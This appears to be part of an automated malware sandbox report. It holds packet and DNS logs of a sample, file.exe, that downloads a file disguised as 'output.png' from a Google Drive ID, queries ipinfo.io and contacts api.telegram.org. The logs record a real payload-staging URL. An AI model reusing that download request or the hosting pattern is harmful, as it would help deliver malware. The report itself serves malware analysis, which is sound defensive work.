                                                                                                                                                                Dec 12, 2024 17:01:21.442694902 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.442754030 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.442797899 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.442845106 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.469253063 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.469321012 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.469341040 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.469397068 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.470343113 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.470400095 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.470421076 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.470488071 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.474355936 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.474416971 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.475886106 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.475955009 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.483351946 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.483418941 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.483496904 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.483553886 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.492038965 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.492100954 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.492130041 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.492182970 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.502837896 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.502926111 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.502948999 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.503020048 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.503031969 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.503082991 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.504122972 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.504182100 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.512053967 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.512254000 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.513453960 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.513536930 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.520833015 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.520894051 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.522285938 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.522344112 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.529861927 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.529932976 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.531234026 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.531286001 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.538794994 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.538858891 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.540003061 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.540055037 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.548248053 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.548305988 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.549546957 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.549599886 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.572715998 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.572793961 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.574023008 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.574080944 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.574115038 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.574161053 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.577440977 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.577508926 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.577626944 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.577692986 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.580513954 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.580569983 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.589107990 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.589196920 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.590281010 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.590334892 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.590802908 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.590854883 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.593590975 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.593641043 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.593986034 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.594033957 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.596434116 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.596487045 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.596502066 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.596551895 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.599189997 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.599256992 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.599334955 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.599389076 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.601988077 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.602054119 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.602072954 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.602123022 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.604489088 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.604540110 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.606309891 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.606363058 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.606394053 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.606441975 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.609054089 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.609107971 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.611192942 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.611258984 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.611351967 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.611407995 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.613166094 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.613238096 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.613687992 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.613739014 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.615396023 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.615446091 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.616722107 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.617716074 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.617723942 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.617769957 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.618839979 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.618954897 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.618963957 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.619008064 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.622427940 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.624634981 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.624644995 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.624699116 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.627310038 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.627939939 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.627954006 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.627995968 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.632692099 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.633519888 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.633598089 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.633692980 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.633708954 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.757354021 CET49719443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:21.757396936 CET4434971934.117.59.81192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.757462025 CET49719443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:21.757719994 CET49719443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:21.757730961 CET4434971934.117.59.81192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:22.806597948 CET44349712149.154.167.220192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:22.806700945 CET49712443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:22.908276081 CET49712443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:22.908297062 CET44349712149.154.167.220192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:22.908580065 CET44349712149.154.167.220192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:22.909696102 CET49712443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:22.915688992 CET49712443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:22.959331989 CET44349712149.154.167.220192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:22.971157074 CET4434971934.117.59.81192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:22.971268892 CET49719443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:23.051800966 CET49719443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:23.051829100 CET4434971934.117.59.81192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:23.052268982 CET4434971934.117.59.81192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:23.052344084 CET49719443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:23.052906036 CET49719443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:23.095375061 CET4434971934.117.59.81192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:23.400791883 CET44349712149.154.167.220192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:23.400841951 CET49712443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:23.400859118 CET44349712149.154.167.220192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:23.400887966 CET44349712149.154.167.220192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:23.400902033 CET49712443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:23.400922060 CET49712443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:23.402077913 CET49712443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:23.402091026 CET44349712149.154.167.220192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:23.474118948 CET4434971934.117.59.81192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:23.474178076 CET49719443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:23.474183083 CET4434971934.117.59.81192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:23.474229097 CET49719443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:23.474968910 CET49719443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:23.474987984 CET4434971934.117.59.81192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:23.512643099 CET49720443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:23.512718916 CET44349720149.154.167.220192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:23.512794018 CET49720443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:23.513190985 CET49720443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:23.513206005 CET44349720149.154.167.220192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:24.881366968 CET44349720149.154.167.220192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:24.881591082 CET49720443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:24.884365082 CET49720443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:24.884380102 CET44349720149.154.167.220192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:24.884619951 CET44349720149.154.167.220192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:24.884677887 CET49720443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:24.885040998 CET49720443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:24.931329012 CET44349720149.154.167.220192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:25.429661989 CET44349720149.154.167.220192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:25.429749012 CET44349720149.154.167.220192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:25.429862976 CET49720443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:25.488440037 CET49720443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:25.488466978 CET44349720149.154.167.220192.168.2.5

                                                                                                                                                                UDP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Dec 12, 2024 17:01:10.767008066 CET6250253192.168.2.51.1.1.1
                                                                                                                                                                Dec 12, 2024 17:01:10.904217958 CET53625021.1.1.1192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:13.593091011 CET4924753192.168.2.51.1.1.1
                                                                                                                                                                Dec 12, 2024 17:01:13.730916977 CET53492471.1.1.1192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.406258106 CET6114653192.168.2.51.1.1.1
                                                                                                                                                                Dec 12, 2024 17:01:19.544481993 CET53611461.1.1.1192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.301318884 CET5111253192.168.2.51.1.1.1
                                                                                                                                                                Dec 12, 2024 17:01:21.439353943 CET53511121.1.1.1192.168.2.5

                                                                                                                                                                DNS Queries

                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                Dec 12, 2024 17:01:10.767008066 CET192.168.2.51.1.1.10x28eStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 12, 2024 17:01:13.593091011 CET192.168.2.51.1.1.10xa25fStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 12, 2024 17:01:19.406258106 CET192.168.2.51.1.1.10xd015Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 12, 2024 17:01:21.301318884 CET192.168.2.51.1.1.10x667eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                                DNS Answers

                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                Dec 12, 2024 17:01:10.904217958 CET1.1.1.1192.168.2.50x28eNo error (0)drive.google.com216.58.208.238A (IP address)IN (0x0001)false
                                                                                                                                                                Dec 12, 2024 17:01:13.730916977 CET1.1.1.1192.168.2.50xa25fNo error (0)drive.usercontent.google.com172.217.17.65A (IP address)IN (0x0001)false
                                                                                                                                                                Dec 12, 2024 17:01:19.544481993 CET1.1.1.1192.168.2.50xd015No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                                                Dec 12, 2024 17:01:21.439353943 CET1.1.1.1192.168.2.50x667eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                • drive.google.com
                                                                                                                                                                • drive.usercontent.google.com
                                                                                                                                                                • ipinfo.io
                                                                                                                                                                • api.telegram.org

                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                0192.168.2.549704216.58.208.2384436660C:\Users\user\Desktop\file.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-12 16:01:12 UTC150OUTGET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                User-Agent: FileDownloader
                                                                                                                                                                Host: drive.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-12 16:01:13 UTC1319INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Thu, 12 Dec 2024 16:01:13 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-LHPy8A6rrDjI9f7JUz1TUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                1192.168.2.549705216.58.208.2384435576C:\Users\user\Desktop\file.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-12 16:01:13 UTC150OUTGET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                User-Agent: FileDownloader
                                                                                                                                                                Host: drive.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-12 16:01:14 UTC1319INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Thu, 12 Dec 2024 16:01:13 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-wqpGN7f4yD_1Gzu2ShXAUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                2192.168.2.549706172.217.17.654436660C:\Users\user\Desktop\file.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-12 16:01:15 UTC192OUTGET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                User-Agent: FileDownloader
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                2024-12-12 16:01:18 UTC4919INHTTP/1.1 200 OK
                                                                                                                                                                X-GUploader-UploadID: AFiumC4xnZjtE4tdUWpVJ4W9D__y5_sJJdkOswfWnRHqLlPRk1Kjy7BSS-_ds35MVDFzWfyW3Nl7Dg0
                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                Content-Security-Policy: sandbox
                                                                                                                                                                Content-Security-Policy: default-src 'none'
                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                X-Content-Security-Policy: sandbox
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Content-Disposition: attachment; filename="output.png"
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Access-Control-Allow-Credentials: false
                                                                                                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Content-Length: 156917
                                                                                                                                                                Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT
                                                                                                                                                                Date: Thu, 12 Dec 2024 16:01:18 GMT
                                                                                                                                                                Expires: Thu, 12 Dec 2024 16:01:18 GMT
                                                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                                                X-Goog-Hash: crc32c=h6mvlQ==
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-12 16:01:18 UTC4919INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b6 00 00 01 b6 08 06 00 00 00 13 09 a3 70 00 00 80 00 49 44 41 54 78 9c ec dd 07 7c 14 65 fa 07 f0 df 33 9b 0a 09 bd 9d 15 44 20 64 77 36 80 d8 d0 53 9a dc 59 00 5b d6 ce a9 e7 e9 9d 05 b0 23 2a 4c c0 82 67 c5 72 96 bb bf 9e e8 a9 24 58 41 3d 95 66 c3 16 85 ec ec 12 8a 8a 9e 05 0b 9d 00 29 bb f3 fc 3f bb 49 ee 28 d9 64 76 b3 33 ef 6c f6 fd 7e 3e 7e 3e b2 bb 33 ef 93 64 77 9f 79 cb 3c 6f 06 24 49 b2 ce a8 d3 ba 82 c2 c7 2b 8c 61 0c 14 02 74 08 08 3d c0 68 0f 80 40 a8 02 d3 06 10 af 23 c6 2a 03 fc 11 80 25 58 f4 da cf a2 43 97 a4 54 45 a2 03 90 a4 36 67 cc 98 f6 08 e5 fa 88 30 01 c0 71 00 94 04 ce f2 11 13 3d 03 64 3e 87 85 65 5b 2d 88 52 92 da 2c 99 d8 24 29 59 4e 3c b1 03 ea 32 27 12 d3 24 00 dd 92
